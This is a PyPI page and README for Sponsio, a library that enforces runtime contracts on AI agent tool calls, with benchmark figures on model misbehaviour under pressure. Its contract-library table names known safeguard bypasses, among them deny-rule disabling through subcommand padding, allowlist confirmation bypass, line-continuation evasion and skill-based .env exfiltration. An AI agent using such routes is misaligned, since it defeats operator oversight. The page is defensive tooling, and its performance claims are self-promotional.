Skip to main content

Runtime contract enforcement for LLM agent systems

Project description

English · 简体中文 · 日本語

Sponsio

License Install from PyPI Visit sponsio.dev OWASP Agentic Top 10 Covered

Follow on X Follow on LinkedIn Join our Discord

Help us grow the Sponsio community for better shared Contract Library and policy enforcement. Star the repo!

Sponsio

Runtime enforcement for AI agents. Input policies in natural language; Sponsio compiles them into unbreakable, deterministic agent contracts. Enforced under 0.01ms, zero LLM runtime cost, covers all 10 OWASP Agentic risks.

An agent contract is a runtime check at every agent action, backed by formal methodsNOT a system prompt your agent can ignore or jailbreak.

Works with any stack. LangChain, Claude Agent, OpenAI Agents, Google ADK, CrewAI, Vercel AI, MCP, or any custom tool-calling loop. Python · TypeScript · Prompt · Agent Skills.

Demo video coming soon


SOTA Agent Safety Solutions

Sponsio architecture: Agent Flow + (Natural Language + Pattern Library) compile into Contracts (Assumption → Enforcement), enforced by a Fuzzy LTL Monitor (deterministic + stochastic) that decides Pass / Block · Warn · Escalate / Redirect for every function call, with full audit trail logs feeding back to the agent.

On ODCV-Bench — a third-party benchmark from McGill DMaS — 12 frontier LLMs × 80 trajectories (Claude-Opus-4.6 included), unguarded models cheat in 11.5%–66.7% of runs. With Sponsio, 84.5% of misalignment is blocked on average, while the next-best publicly announced runtime guardrail (Salus, YC W26, launch Feb 2026) reaches 52% on the same benchmark. On the Financial-Audit-Fraud-Finding scenario, frontier models commit fraud in 67% of trials (16/24); with Sponsio, 100% blocked.

Why Sponsio

Approach When it works Where it fails How Sponsio solves
Prompt-injection Filters Pre-generation, on input text Drifts on novel phrasings; sees text, not tool calls; no notion of action history Enforces which tools may run, in what order, with what arguments, before function call executes, with full trace context
Output Validators Post-generation, on response strings The mistakes (e.g. refund, DB write, API call) may already have fired Blocks the call before execution; reasons over the full action history, not just the latest string
LLM-as-Judge Flexible, handles fuzzy properties; useful for offline eval Stochastic verdicts, hundreds-of-ms latency, itself prompt-injectable - unsuitable as a synchronous gate Sub-0.01ms deterministic checks, zero LLM in the hot path; stochastic pipeline is opt-in for fuzzy properties
Sandboxing & Access Control Lists Strong perimeter for identity- and resource-level isolation Narrows agent capability. Gates by who and what resource, not by behavior sequence Enforces temporal contracts over the action sequence, including ordering, history, and multi-step invariants, preserving agent capability

Compared to other deterministic enforcers, Sponsio's edge:

1. Temporal contracts over sequential actions, not stateless rule matching. Existing enforcers evaluate each action in isolation. Sponsio reasons over the full trajectory: "verify_recipient before send_email", "no external calls after PII access", "refund_payment ≤ 3 calls per session".

2. Machine-checkable, not heuristic. Contracts compile to LTL formulas, then to deterministic finite automata. Every verdict is a deterministic DFA transition, not a probabilistic confidence score. Same proof technique used in hardware verification (Intel FPU correctness, AWS S3 TLA+). How it works →

3. Zero to protected in minutes, no DSL learning curve. Existing tools require hand-written YAML / Rego / Cedar policies from scratch. Sponsio offers four paths in:

  • Auto-inferredsponsio init (interactive wizard) reads your tool signatures and writes starter contracts
  • Contract library — include pre-built bundles by capability (sponsio:capability/shell, …/filesystem) or by incident (sponsio:incident/openclaw); each bundle composes 44 det patterns underneath (sto atoms ship in Sponsio Cloud)
  • Natural languagesponsio validate "..." compiles plain English to LTL
  • Policy docsponsio scan --policy security.md parses an existing compliance document

4. Framework-agnostic and low-dependency. Other tools ship as opinionated stacks — bundling identity, SRE, dashboards, orchestration. Sponsio is a single enforcement library that plugs in alongside whatever observability, IAM, and orchestration you already use.


Quick start

Pick your project's language. Instant onboarding with a single prompt or a 2-line CLI command.

Python

Paste into Claude Code / Codex / Cursor. The agent helps run the full onboarding process. Click for the full prompt template. Note: Cursor may not be able to explicitly show what Sponsio has blocked in the conversation, due to its own harness design.

One-shot prompt: Python

Or run the CLI yourself:

pip install sponsio
sponsio init .

init is an interactive wizard. It detects your framework (LangGraph / OpenAI / Claude Agent / Vercel AI / CrewAI / MCP / …), asks which IDE hosts to wire up (Claude Code / Codex / Cursor / OpenClaw, each at none / skill / full level), and observe vs enforce mode. Then it writes sponsio.yaml and prints the 2-line patch:

from sponsio.langgraph import Sponsio
from langgraph.prebuilt import create_react_agent

guard = Sponsio(config="sponsio.yaml", agent_id="coding_agent")
agent = create_react_agent(model, guard.wrap(tools))

TypeScript

Paste into Claude Code / Codex / Cursor:

One-shot prompt: TypeScript

Or run the CLI yourself:

npm install -D @sponsio/sdk
npx sponsio init .

Note — the TS wizard is currently single-axis (provider × mode × agent). For the full multi-axis flow that also installs IDE-host plugins (Claude Code / Codex / Cursor / OpenClaw), paste the Python prompt above into your IDE agent — it works on TS projects too (drives the Python sponsio CLI, writes a TS-compatible sponsio.yaml).

import { Sponsio } from "@sponsio/sdk";
import { wrapTools } from "@sponsio/sdk/langchain";
import { ToolNode } from "@langchain/langgraph/prebuilt";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "coding_agent" });
const toolNode = new ToolNode(wrapTools(tools, guard));

For OpenClaw Community

The Python prompt above is the install path for you too. Pick openclaw=full when the wizard asks about IDE hosts; Sponsio then gates every before_tool_call event in your OpenClaw runtime through the contract engine, with ClawHavoc + CVE-2026-25253 coverage via the bundled sponsio:incident/openclaw pack.

Watch live blocks in your terminal — every Sponsio decision against your OpenClaw runtime streams here:

sponsio host trace openclaw --follow

sponsio.yaml can also be hand-written, scanned from a policy doc (sponsio scan --policy policy.md), or mined from traces (sponsio refresh). Syntax: docs/concepts/contracts.md.

Full walkthrough: QUICKSTART.md — config reference, observe → enforce flip, sponsio refresh, CI wiring, troubleshooting.


Benchmarks & Performance

Sponsio is benchmarked on two public agent-safety suites covering two distinct failure modes — rational KPI-pressure metric gaming, and dangerous bash / python snippet detection. All offline-replay against published trajectories, not Sponsio-authored test sets, and library-only (no per-scenario LLM scan on the blocking path).

Benchmark What it measures Sponsio result
ODCV-Bench (12 LLMs × 80 trajectories) Intent integrity under KPI pressure 84.5% blocked (next-best published baseline: 52%) · 0 new FPs on clean scenarios
RedCode-Exec (1,410 cases) Dangerous bash / python snippet detection 95% bash · 90% python · 92% combined · 0% utility FP on 60-file clean-code audit

Both libraries ship as loadable contract packs. Semantic properties det can't fingerprint (tone, hallucination, scope drift in NL output) require an LLM judge — the OSS engine ships a Judge extension point you can plug; the managed stochastic pipeline is a Sponsio Cloud feature.

Logic-flaw failures are deterministically catchable too

Conventional wisdom said RedCode's logic-flaw categories — biased decision logic, weak regex bypasses, missing-authorisation patterns, algorithmic flaws, memory leaks — were "behavioural defects with no syscall fingerprint" and required a semantic LLM judge. We pushed back on that label. Every such failure surfaces as a finite code-text pattern; once the pattern is enumerated, det binds. Seven new layers (bias_logic, weak_regex, algo_flaw, memory_leak, match_no_default, missing_auth, redcode_unauth_marker) lifted RedCode python from 69% → 90% with 0/60 FP on a clean-code audit (Sponsio's own source, tests, and API routes). The det/sto boundary is wider than most guardrail authors assumed; sto stays for properties that genuinely live in free-form output (tone, hallucination, faithfulness) — not for code-shape patterns whose finite enumeration was just under-explored.

Hot-Path Performance

Workload Contracts p50 p99
Synthetic micro-bench (single contract, pre-warmed DFA) 1 0.0052 ms 0.012 ms
ODCV-Bench mandated (1,438 calls, scan-discovered) 6–18 0.139 ms 0.765 ms
RedCode bash (3,848 per-command calls) 7 0.434 ms 0.558 ms
RedCode python (810 whole-script calls) 9 0.811 ms 1.035 ms

Backend-engineer anchor: at 0.139 ms p50 on ODCV mandated, Sponsio's hot path adds less overhead than a single local Redis read (typical 0.1–0.5 ms).

5,000×–60,000× faster than any LLM-as-judge guardrail (gpt-4o-mini, Lakera Guard, OpenAI Moderation — all 50–800 ms per check) on the same per-tool-call workload, at zero LLM cost on the hot path. Per-call latency scales linearly with contract count; p99 stays under 1.04 ms across every measured workload. The heaviest scenario (9-contract layered regex over a whole RedCode python script) is still 50× faster than the cheapest LLM-as-judge call.

Full per-model breakdown, methodology, harness scripts: docs/reference/benchmarks.md.

Today's numbers are starting points, not ceilings

production traces ──→ sponsio scan ──→ proposed contracts
       ↑                                       │
       │                                       ▼
       └──────── enforcement ←──────── library (versioned)

Today's 84.5% / 92% are starting points, not ceilings. The library grows from your traces and ships back upstream — every new attack pattern, every newly observed unsafe call, feeds the next release.


Contract Library

Sixteen contract bundles ship out of the box, organized by tier (always-on / per-tool / per-incident). Each bundle is a YAML pack composed from Sponsio's 44 det patterns (sto atoms ship in Sponsio Cloud). Drop one into sponsio.yaml and your agent is guarded against a known failure class in one line, with no per-contract authoring. The seven highlighted below are the most commonly used.

Starter bundles

Bundle Tier Rules Who it's for
sponsio:core/universal Always-on 5 sto (Cloud) Any LLM agent. Response-scoped checks: prompt injection, jailbreak, harm, toxic, semantic PII. Requires a configured judge — managed in Sponsio Cloud, or BYO judge via the OSS Judge extension point. Without one, these log-and-skip on OSS.
sponsio:core/runaway Always-on 5 det Any agent with token use, delegation, or tool loops. The "while(true) with a credit card" defense: token budgets, delegation depth, loop caps.
sponsio:capability/shell Per-tool 11 det Agents exposing exec / bash. Catches rm -rf /, fork bombs, curl | bash, reverse shells, line-continuation evasion. Inspired by Claude Code #10077 (rm -rf $HOME, Oct 2025), the Replit prod-DB wipe (Fortune coverage, Jul 2025), and the Ansible rm -rf {foo}/{bar} postmortem on 1,535 servers (Marsala, 2016).
sponsio:capability/filesystem Per-tool 13 det Agents exposing read / write / edit / apply_patch. Sensitive-path denies, workspace scoping, bootstrap-file gates (CLAUDE.md, AGENTS.md, .cursorrules). Inspired by the OpenClaw weather-skill .env exfil and the Cursor .cursorignore bypass (CVE-2025-64110 / GHSA-vhc2-fjv4-wqch).
sponsio:incident/openclaw Incident 45 mixed OpenClaw / ClawCode users. Covers CVE-2026-25253 (WebSocket 1-click RCE), ClawHavoc — 1,184 malicious skills on ClawHub (Koi Security disclosure, Feb 2026), the --yolo flag, and the weather-skill exfil. A worked example to fork rules from.
sponsio:incident/cursor-railway-wipe Incident mixed Replays the PocketOS production-DB wipe (Apr 24, 2026) — Cursor + Claude Opus 4.6 deleted prod + backups in 9 seconds via an over-scoped Railway API token. (Tom's Hardware · Railway's own postmortem) Catches credential-scope abuse + destructive-API gates.
sponsio:incident/claude-code-secret-bypass Incident mixed Replays CVE-2025-55284 (overly broad safe-command allowlist → file-read confirmation bypass) and the deny-rule cap bypass (50-subcommand padding silently disables deny rules). Catches secret reads + arg-padding evasion.
# sponsio.yaml — one-line bundle inclusion
agents:
  my_agent:
    workspace: "/srv/my-bot"
    include:
      - sponsio:core/runaway          # always-on
      - sponsio:core/universal        # always-on
      - sponsio:capability/shell      # if your agent runs commands
      - sponsio:capability/filesystem # if your agent touches files

sponsio init auto-selects tier-0 bundles based on your detected tool inventory. You can disable or retune individual rules without forking the pack: customized: lets you target rules by their desc, pack_source, or pattern field. Rename canonical tool names (exec, read, edit) to your agent's via tool_rename:.

Full bundle reference is at docs/reference/contract-lib.md. The underlying primitives that bundles compose are catalogued separately: 44 det patterns in docs/reference/patterns.md. Sto atoms (LLM-judge evaluators for tone, hallucination, scope drift, etc.) are part of Sponsio Cloud — the OSS engine ships a Judge extension point for bring-your-own-judge use.

Want a bundle for your agent type? This is currently the highest-leverage way to contribute. Open an issue with your incident, CVE, or pattern.


Integrations

Pick your framework — each block expands to a drop-in snippet. Python and TypeScript share the same engine and DSL.

No framework — custom tool-calling loop
from sponsio import Sponsio

guard = Sponsio(config="sponsio.yaml", agent_id="bank_bot")

for name, args in agent_calls:
    result = guard.guard_before(name, args)
    if result.blocked:
        continue
    output = tools[name](**args)
    guard.guard_after(name, output)
import { Sponsio } from "@sponsio/sdk";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "bank_bot" });

const result = guard.guardBefore(name, args);
if (!result.blocked) {
  const output = tools[name](args);
  guard.guardAfter(name, output);
}
LangGraph / LangChain.js — wrap tools
from sponsio.langgraph import Sponsio
from langgraph.prebuilt import create_react_agent

guard = Sponsio(config="sponsio.yaml", agent_id="hr_bot")
agent = create_react_agent(llm, guard.wrap(tools))
import { Sponsio } from "@sponsio/sdk";
import { wrapTools } from "@sponsio/sdk/langchain";
import { ToolNode } from "@langchain/langgraph/prebuilt";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "hr_bot" });
const toolNode = new ToolNode(wrapTools(tools, guard));
Claude Agent SDK — native hooks, zero tool wrapping
from sponsio.claude_agent import Sponsio
from claude_agent_sdk import ClaudeSDKClient, ClaudeAgentOptions

guard = Sponsio(config="sponsio.yaml", agent_id="support_bot")
options = ClaudeAgentOptions(hooks=guard.hooks())

async with ClaudeSDKClient(options=options) as client:
    await client.query("Refund order #W456.")
import { Sponsio } from "@sponsio/sdk";
import { sponsioHooks } from "@sponsio/sdk/claude-agent";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "support_bot" });
const hooks = sponsioHooks(guard);
// Pass `hooks` to ClaudeSDKClient options.
OpenAI SDK — monkey-patch or explicit wrap
from sponsio.openai import Sponsio

guard = Sponsio(config="sponsio.yaml", agent_id="db_admin")
resp = client.chat.completions.create(...)
guard.check_response(resp)
import OpenAI from "openai";
import { Sponsio } from "@sponsio/sdk";
import { wrapOpenAI } from "@sponsio/sdk/openai";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "db_admin" });
const client = wrapOpenAI(new OpenAI(), guard);

For a quick no-YAML wire-up (handy in scripts / notebooks): from sponsio.openai import patch_openai.

OpenAI Agents SDK — wrap Agent tools
from sponsio.agents import Sponsio
from agents import Agent, Runner

guard = Sponsio(config="sponsio.yaml", agent_id="deploy_bot")

agent = Agent(
    name="deploy_bot",
    instructions="Ship v2.1 to production.",
    tools=guard.wrap([run_tests, deploy_staging, deploy_production]),
)

result = Runner.run_sync(agent, "Deploy v2.1 now.")

TypeScript: not yet supported.

Google ADK — wrap Agent tools (Gemini)
from sponsio.google_adk import Sponsio
from google.adk.agents.llm_agent import Agent

guard = Sponsio(config="sponsio.yaml", agent_id="travel_agent")

root_agent = Agent(
    name="travel_agent",
    model="gemini-flash-latest",
    instruction="Search before booking. Charge only once.",
    tools=guard.wrap([search_flights, book_flight, charge_payment]),
)
import { Sponsio } from "@sponsio/sdk";
import { wrapGoogleAdkTools } from "@sponsio/sdk/google-adk";
import { LlmAgent } from "@google/adk";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "travel_agent" });
const tools = wrapGoogleAdkTools([searchFlights, bookFlight, chargePayment], guard);
export const rootAgent = new LlmAgent({ name: "travel_agent", tools, model: "gemini-flash-latest" });
Vercel AI SDK — middleware
from sponsio.vercel_ai import Sponsio

guard = Sponsio(config="sponsio.yaml", agent_id="publish_bot")

async for msg in agent.run(model, messages, middleware=[guard.wrap()]):
    ...
import { Sponsio } from "@sponsio/sdk";
import { sponsioMiddleware } from "@sponsio/sdk/vercel-ai";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "publish_bot" });
const middleware = sponsioMiddleware(guard);
CrewAI — Crew-level hooks
from sponsio.crewai import Sponsio
from crewai import Agent, Crew, Task

guard = Sponsio(config="sponsio.yaml", agent_id="moderator")

crew = Crew(
    agents=[agent],
    tasks=[task],
    before_tool_call=guard.on_tool_start,
    after_tool_call=guard.on_tool_end,
)
result = crew.kickoff()

TypeScript: not yet supported.

MCP — proxy the MCP client
from sponsio.mcp import MCPContractProxy

# Build a sponsio System from your contracts — see runnable example for full wire-up.
proxy = MCPContractProxy(mcp_client=your_mcp_client, system=system)

# Use `proxy` wherever you called the raw MCP client; contracts apply transparently.
result = await proxy.call_tool("write_external_api", {"data": "batch_1"})

TypeScript: not yet supported.


Note on the snippets above. All examples assume you've run sponsio init . first, which walks the wizard, generates a sponsio.yaml with a starter contract set inferred from your tool inventory, and prints the wrap snippet to paste. To populate the YAML differently — pattern-library bundle, hand-written rules, natural-language one-liners, or parsed from a policy doc (sponsio scan --policy security.md) — see Contract types and authoring and docs/concepts/contracts.md for full syntax.


Docs

AI agents reading this repo: llms.txt lists canonical doc paths; llms-full.txt is the concatenated full context dump.


Security

Sponsio enforces runtime contracts, so its own correctness matters. Found something? Report privately via GitHub's security advisory form rather than a public issue. See SECURITY.md for scope, timelines, and what counts as in-scope (enforce-mode bypasses, LTL-evaluator crashes, session-log leakage, judge-prompt injection, etc.).


Contributing

Patches, issue reports, and new pattern proposals are welcome. Start with CONTRIBUTING.md.


Important notes

Sponsio enforces runtime contracts that you define — it does not certify your application's compliance with any regulatory framework. If you operate in regulated domains (HIPAA, GDPR, SOX, EU AI Act, financial services, healthcare), Sponsio's controls and our OWASP Agentic Top 10 mapping are inputs to your compliance program. They are not substitutes for qualified security audit, legal review, or domain-specific regulatory analysis. Author your contracts with appropriate review and revisit them when your agent's tool surface changes.

Det contracts give you machine-checkable enforcement at the action boundary. They do not protect against vulnerabilities upstream of Sponsio (compromised LLM provider, malicious tools you've allowlisted, infrastructure-layer risks like transport encryption / SBOM provenance). See SECURITY.md for the full scope.


License & open source promise

Apache 2.0 — see LICENSE.

Sponsio Labs is a commercial company; Sponsio Cloud (pip install sponsio[cloud]) opens mid-May 2026 and adds the managed LLM-judge pipeline, cross-customer pattern intelligence, and a hosted multi-tenant dashboard. The OSS engine is complete and production-ready for self-hosted use — see OSS_PROMISE.md for what stays in OSS forever, what we sell, and what we promise about the boundary.

Sponsio™ is a trademark of Sponsio Labs — see BRAND.md.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

sponsio-0.1.0.tar.gz (906.8 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

sponsio-0.1.0-py3-none-any.whl (719.9 kB view details)

Uploaded Python 3

File details

Details for the file sponsio-0.1.0.tar.gz.

File metadata

  • Download URL: sponsio-0.1.0.tar.gz
  • Upload date:
  • Size: 906.8 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.9.6

File hashes

Hashes for sponsio-0.1.0.tar.gz
Algorithm Hash digest
SHA256 8ef7ef10368f0d003248b2c6127518f6d5379cd6caa753dbc2480f6f0aa0ebbe
MD5 54f3dd721345fe16e13f2452fcd04e11
BLAKE2b-256 fd78acc61a1d63c2996cc74b7873c3f2aea58616ea5f3be4df904742fd4d0c75

See more details on using hashes here.

File details

Details for the file sponsio-0.1.0-py3-none-any.whl.

File metadata

  • Download URL: sponsio-0.1.0-py3-none-any.whl
  • Upload date:
  • Size: 719.9 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.9.6

File hashes

Hashes for sponsio-0.1.0-py3-none-any.whl
Algorithm Hash digest
SHA256 eeca17ef085fbba245d62d3aff011036138a9b7f1ced17460c096deedb03dcf5
MD5 153cb7979a2f8c1a8a371f12eebd5e08
BLAKE2b-256 c098c90b739d5b1c6acce981a9bbc34ae2fa3c40b5e757ec835c088896cb01cc

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page